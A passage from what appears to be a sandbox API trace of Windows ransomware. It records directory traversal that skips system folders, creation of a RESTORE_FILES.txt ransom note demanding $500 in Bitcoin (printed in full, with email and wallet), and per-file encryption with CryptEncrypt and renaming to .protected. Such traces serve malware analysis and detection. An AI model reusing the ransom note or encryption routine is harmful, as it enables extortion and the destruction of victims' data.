lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.770] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.770] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.770] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.770] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.770] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.770] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.770] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\..") returned 68 [0084.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.770] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.770] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.770] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.770] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt") returned 83 [0084.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.770] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.770] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.771] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.771] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.771] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.771] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.771] CloseHandle (hObject=0xd8) returned 1 [0084.771] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0084.772] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer") returned 75 [0084.772] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0084.772] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0084.772] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned 77 [0084.772] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.781] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.781] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.781] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.781] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.781] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.781] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\.") returned 77 [0084.781] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.781] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.781] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.781] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.781] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.781] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.781] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.781] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\..") returned 78 [0084.781] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.781] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.781] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="Windows") returned -1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files") returned -1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files (x86)") returned -1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="$Recycle.bin") returned 1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="System Volume Information") returned -1 [0084.781] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.781] StrStrIW (lpFirst="brndlog.bak", lpSrch=".protected") returned 0x0 [0084.781] lstrcmpW (lpString1="brndlog.bak", lpString2="RESTORE_FILES.txt") returned -1 [0084.781] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.782] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.782] StrStrW (lpFirst="brndlog.bak", lpSrch=".txt") returned 0x0 [0084.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.782] StrStrW (lpFirst="brndlog.bak", lpSrch=".rar") returned 0x0 [0084.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.782] StrStrW (lpFirst="brndlog.bak", lpSrch=".zip") returned 0x0 [0084.782] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.784] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.784] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.784] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.784] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.784] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.784] CloseHandle (hObject=0x14c) returned 1 [0084.784] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected") returned 97 [0084.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.protected")) returned 1 [0084.785] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="Windows") returned -1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files") returned -1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files (x86)") returned -1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="$Recycle.bin") returned 1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="System Volume Information") returned -1 [0084.785] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 87 [0084.785] StrStrIW (lpFirst="brndlog.txt", lpSrch=".protected") returned 0x0 [0084.785] lstrcmpW (lpString1="brndlog.txt", lpString2="RESTORE_FILES.txt") returned -1 [0084.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 87 [0084.786] StrStrW (lpFirst="brndlog.txt", lpSrch=".txt") returned=".txt" [0084.786] lstrlenW (lpString=".txt") returned 4 [0084.786] lstrlenW (lpString=".txt") returned 4 [0084.787] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.799] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.799] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x7b0, lpOverlapped=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff850, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.799] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x7b0, lpOverlapped=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.799] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.800] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.800] CloseHandle (hObject=0x14c) returned 1 [0084.800] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected") returned 97 [0084.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.protected")) returned 1 [0084.800] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.800] lstrcmpiW (lpString1="DOMStore", lpString2="Windows") returned -1 [0084.800] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files") returned -1 [0084.800] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files (x86)") returned -1 [0084.801] lstrcmpiW (lpString1="DOMStore", lpString2="$Recycle.bin") returned 1 [0084.801] lstrcmpiW (lpString1="DOMStore", lpString2="System Volume Information") returned -1 [0084.801] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore") returned 84 [0084.801] lstrcmpW (lpString1="DOMStore", lpString2=".") returned 1 [0084.801] lstrcmpW (lpString1="DOMStore", lpString2="..") returned 1 [0084.801] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*") returned 86 [0084.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.801] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.801] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.801] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.802] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.802] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.802] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\.") returned 86 [0084.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.802] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.802] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.802] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.802] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.802] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.802] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.802] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.802] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.802] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.802] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.802] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\..") returned 87 [0084.802] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.802] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.802] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.802] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.802] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.802] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.802] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.802] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="Windows") returned -1 [0084.802] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="Program Files") returned -1 [0084.803] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="Program Files (x86)") returned -1 [0084.803] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="$Recycle.bin") returned 1 [0084.803] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="System Volume Information") returned -1 [0084.803] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned 93 [0084.803] lstrcmpW (lpString1="3LKBQZJ3", lpString2=".") returned 1 [0084.803] lstrcmpW (lpString1="3LKBQZJ3", lpString2="..") returned 1 [0084.803] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*") returned 95 [0084.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.804] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.804] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.804] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.804] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.804] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\.") returned 95 [0084.804] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.804] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.804] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.804] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.804] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.804] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.804] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.804] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.804] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\..") returned 96 [0084.804] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.804] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.804] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.804] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\.." (normalized: 